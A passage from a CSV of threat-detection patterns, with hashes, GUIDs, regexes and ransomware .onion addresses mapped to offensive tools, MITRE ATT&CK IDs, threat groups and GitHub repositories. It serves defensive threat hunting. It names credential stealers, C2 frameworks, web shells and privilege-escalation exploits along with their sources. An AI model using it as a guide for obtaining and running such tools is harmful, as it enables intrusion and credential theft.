LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","#filehash","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","42589" 
"*ebe4b211d5a78a04727f24438102b25abc60f10ac6f222a05fbdaf119c23707e*",".{0,1000}ebe4b211d5a78a04727f24438102b25abc60f10ac6f222a05fbdaf119c23707e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42590" "*ebe64c00a953cf3b93b69b2b1b275b9bc97fb70a85713bfc1df6fb1d15e4c938*",".{0,1000}ebe64c00a953cf3b93b69b2b1b275b9bc97fb70a85713bfc1df6fb1d15e4c938.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","42591" "*ebe927a4481119e426d73ba93236206922902cb1a5eb34a85be60294c81e4b0d*",".{0,1000}ebe927a4481119e426d73ba93236206922902cb1a5eb34a85be60294c81e4b0d.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","42592" "*ebef8a0206bb0550926511265edc977c0a75de6dd8a03be4e228cf708ac64c24*",".{0,1000}ebef8a0206bb0550926511265edc977c0a75de6dd8a03be4e228cf708ac64c24.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - 
T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","42594" "*ebf94bb78b8deae210b897fd7c7da691e9fcfd215e641f28c5a0056a69e63aa6*",".{0,1000}ebf94bb78b8deae210b897fd7c7da691e9fcfd215e641f28c5a0056a69e63aa6.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","42595" "*ebf98b345bcc6ffd230e9ff5554fa32c998f0801ed0b1d4f2bd3c2e5bbf16a8d*",".{0,1000}ebf98b345bcc6ffd230e9ff5554fa32c998f0801ed0b1d4f2bd3c2e5bbf16a8d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42596" "*ebf9bf76500715fe20c475140d200e76b51c400406683827eabb2ab70f9f986f*",".{0,1000}ebf9bf76500715fe20c475140d200e76b51c400406683827eabb2ab70f9f986f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42597" "*ebfb867fcb1efed0a7e4d9bb43b5b6d22f8744446bb29bcaf76aa6a48f36bf9c*",".{0,1000}ebfb867fcb1efed0a7e4d9bb43b5b6d22f8744446bb29bcaf76aa6a48f36bf9c.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","42598" "*ebfbe1788f944eda7614d311a9b6ca197a6d595910bf19e8f8dcfe7d92e77215*",".{0,1000}ebfbe1788f944eda7614d311a9b6ca197a6d595910bf19e8f8dcfe7d92e77215.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","42599" "*ebfebca063aa056d7ffd8767c7c82d66c0c1a4339eb504a8e0636280dc5b839f*",".{0,1000}ebfebca063aa056d7ffd8767c7c82d66c0c1a4339eb504a8e0636280dc5b839f.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - 
TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#filehash","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","42601" "*ebffe9aadf0e6b25df7573ca04de5b12d79ad0103d1fd936e333660b4359006c*",".{0,1000}ebffe9aadf0e6b25df7573ca04de5b12d79ad0103d1fd936e333660b4359006c.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","42602" "*ebfidpplhabeedpnhjnobghokpiioolj*",".{0,1000}ebfidpplhabeedpnhjnobghokpiioolj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","42603" "*ebljej7okwfnx5hdfikqqt2uqehihqv3yns3ziij5clqpklwb3i2cxad.onion*",".{0,1000}ebljej7okwfnx5hdfikqqt2uqehihqv3yns3ziij5clqpklwb3i2cxad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","42604" "*Ebowla-master.zip*",".{0,1000}Ebowla\-master\.zip.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","42605" 
"*ebwexiymbsib4rmw.onion*",".{0,1000}ebwexiymbsib4rmw\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","42606" "*ec002016f00ae6f232c1d5e166e5a01e48d3b25302e96a69d87fbf3fc8f05e50*",".{0,1000}ec002016f00ae6f232c1d5e166e5a01e48d3b25302e96a69d87fbf3fc8f05e50.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","#filehash","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","42607" "*ec0c4d2a63a8eacbd2bc8e93f00b4a0402b3f98a72c9e4218e0d6d7a8e438da6*",".{0,1000}ec0c4d2a63a8eacbd2bc8e93f00b4a0402b3f98a72c9e4218e0d6d7a8e438da6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42609" "*ec19621c142ea507d319f064c4dc19ffa3026c4e084920f0486e13a34d877d8b*",".{0,1000}ec19621c142ea507d319f064c4dc19ffa3026c4e084920f0486e13a34d877d8b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42610" "*ec1c4cf05df4d398a2808a094ceabc9c75ec5c59e51d5bc0c5814dd140a45df7*",".{0,1000}ec1c4cf05df4d398a2808a094ceabc9c75ec5c59e51d5bc0c5814dd140a45df7.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from 
SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","42611" "*ec1e39774b339fa1939d8b970961041349ecf364ca612d376a42744db8132223*",".{0,1000}ec1e39774b339fa1939d8b970961041349ecf364ca612d376a42744db8132223.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42612" "*ec212e0be2629efd3fe6c0d1085d4d42f1245a30ff2dbe97fe708cdbdd55879c*",".{0,1000}ec212e0be2629efd3fe6c0d1085d4d42f1245a30ff2dbe97fe708cdbdd55879c.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","42613" "*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052*",".{0,1000}EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42614" "*ec260817672bcc48f734f89e9eac84ebc7903924b36f807caf58c6820c0e336c*",".{0,1000}ec260817672bcc48f734f89e9eac84ebc7903924b36f807caf58c6820c0e336c.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","#filehash","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","42615" "*ec2a250f026c030d36c1f1d021816176a7a9a8f62f56673b418bca9154c5a3f1*",".{0,1000}ec2a250f026c030d36c1f1d021816176a7a9a8f62f56673b418bca9154c5a3f1.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","42616" "*ec2aaff0-b349-4855-9093-96acf6ee3299*",".{0,1000}ec2aaff0\-b349\-4855\-9093\-96acf6ee3299.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#GUIDProject","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","42617" 
"*ec2b6024e73498b915399094e92d9976dfb2f1fbe07e476d67f36edbfb9b8532*",".{0,1000}ec2b6024e73498b915399094e92d9976dfb2f1fbe07e476d67f36edbfb9b8532.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","42618" "*ec31a1b9d3b5672137349a35719e2f595394a90f3978d60ef5ffe7900763ac00*",".{0,1000}ec31a1b9d3b5672137349a35719e2f595394a90f3978d60ef5ffe7900763ac00.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42620" "*ec359f50ca15395f273899c0ff7c0cd87ab5c2e23fdcfc6c72fedc0097161d4b*",".{0,1000}ec359f50ca15395f273899c0ff7c0cd87ab5c2e23fdcfc6c72fedc0097161d4b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42621" "*ec37a2d841bd68da48bf8743a40bd25049ce081bfff67802900163b4b8f8f84c*",".{0,1000}ec37a2d841bd68da48bf8743a40bd25049ce081bfff67802900163b4b8f8f84c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42622" 
"*ec38d2205220614ff7a5d76311a5661851da7442734adf67df1890ff80fa7e51*",".{0,1000}ec38d2205220614ff7a5d76311a5661851da7442734adf67df1890ff80fa7e51.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","42623" "*ec3fea4e00eb0a4712a869b52eacce7efbcdcc9b958b8f46066e6f8969c4f79c*",".{0,1000}ec3fea4e00eb0a4712a869b52eacce7efbcdcc9b958b8f46066e6f8969c4f79c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42625" "*ec465f60755310dd0a79b20e355caf67c0c5f049e1ae8e9b9d1503fe198ef7bb*",".{0,1000}ec465f60755310dd0a79b20e355caf67c0c5f049e1ae8e9b9d1503fe198ef7bb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42627" 
"*EC49A1B1-4DAA-47B1-90D1-787D44C641C0*",".{0,1000}EC49A1B1\-4DAA\-47B1\-90D1\-787D44C641C0.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#GUIDproject","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","42628" "*EC54E?F8D79BF30B63C5249AF7A8A3C652595B923*",".{0,1000}EC54E\?F8D79BF30B63C5249AF7A8A3C652595B923.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","42629" "*ec57e5c4d592d1ad0a0e79b22e85f8173bcb3c03f4497957f90def4175ca383d*",".{0,1000}ec57e5c4d592d1ad0a0e79b22e85f8173bcb3c03f4497957f90def4175ca383d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","42630" "*ec5eb13c414c6ab275ccf7b1b142bee66a5002846c6eea22e2c722705cd7cfb4*",".{0,1000}ec5eb13c414c6ab275ccf7b1b142bee66a5002846c6eea22e2c722705cd7cfb4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42632" "*ec61e1fbfdc25380e23baadc18f997d45e27904d16008942de78dc55541a8e0f*",".{0,1000}ec61e1fbfdc25380e23baadc18f997d45e27904d16008942de78dc55541a8e0f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42634" "*EC62CE1D-ADD7-419A-84A9-D6A04E866197*",".{0,1000}EC62CE1D\-ADD7\-419A\-84A9\-D6A04E866197.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","42635" "*ec64054f2ecdaea42d302fe63e1cbb9835998e492ac017d0ea7f2c24bc4c11c2*",".{0,1000}ec64054f2ecdaea42d302fe63e1cbb9835998e492ac017d0ea7f2c24bc4c11c2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42636" "*ec68a6bf7f104a815bd21e27e73a8dfb8afcb282d4997bebe9eccd6c89259506*",".{0,1000}ec68a6bf7f104a815bd21e27e73a8dfb8afcb282d4997bebe9eccd6c89259506.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","42637" "*ec6e3c3f97578eeeb27f891b19c4504e038e0488293eb1f3c50d3bdc2f30b017*",".{0,1000}ec6e3c3f97578eeeb27f891b19c4504e038e0488293eb1f3c50d3bdc2f30b017.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","42638" "*ec6f110ed955c4659147b008e4e1053b15a873b5bb887662b0685f84d929c44c*",".{0,1000}ec6f110ed955c4659147b008e4e1053b15a873b5bb887662b0685f84d929c44c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","42639" "*ec75e03dbec89909be98b833209c2a422ba68f24b0e45818d55b29174d5588b9*",".{0,1000}ec75e03dbec89909be98b833209c2a422ba68f24b0e45818d55b29174d5588b9.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42641" "*ec7ac72aea879c8a68fe5cbd38f8be5f37c7b3ee99ca67481331b8eba84f7726*",".{0,1000}ec7ac72aea879c8a68fe5cbd38f8be5f37c7b3ee99ca67481331b8eba84f7726.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42643" "*ec7b353c3fe0edb57fb5bb38daa0b17b006e2a1eb9df64f3364b12bc63e7414f*",".{0,1000}ec7b353c3fe0edb57fb5bb38daa0b17b006e2a1eb9df64f3364b12bc63e7414f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42644" "*ec9204b818a8bf3893428eb9c869e8aa2d53eaac52d9cb249ede288dbf042fea*",".{0,1000}ec9204b818a8bf3893428eb9c869e8aa2d53eaac52d9cb249ede288dbf042fea.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","42647" 
"*ec945b53d3005194ef0710397f7179e57f7249012ce85ab47ee6b1519bc48d31*",".{0,1000}ec945b53d3005194ef0710397f7179e57f7249012ce85ab47ee6b1519bc48d31.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42648" "*eca140e2de5725eeaa29ab48f86e1745ef0232aaafd04298eccb742e1241171b*",".{0,1000}eca140e2de5725eeaa29ab48f86e1745ef0232aaafd04298eccb742e1241171b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42649" "*eca3042259ae46f23a3a5484d10d6a12fe40abf58ff167af0e7efcf3c2b9c0b5*",".{0,1000}eca3042259ae46f23a3a5484d10d6a12fe40abf58ff167af0e7efcf3c2b9c0b5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42651" "*eca525adef0c1dae7233b25f241c19cddbe8683cbbadd7c69915f7b3c37fb21f*",".{0,1000}eca525adef0c1dae7233b25f241c19cddbe8683cbbadd7c69915f7b3c37fb21f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
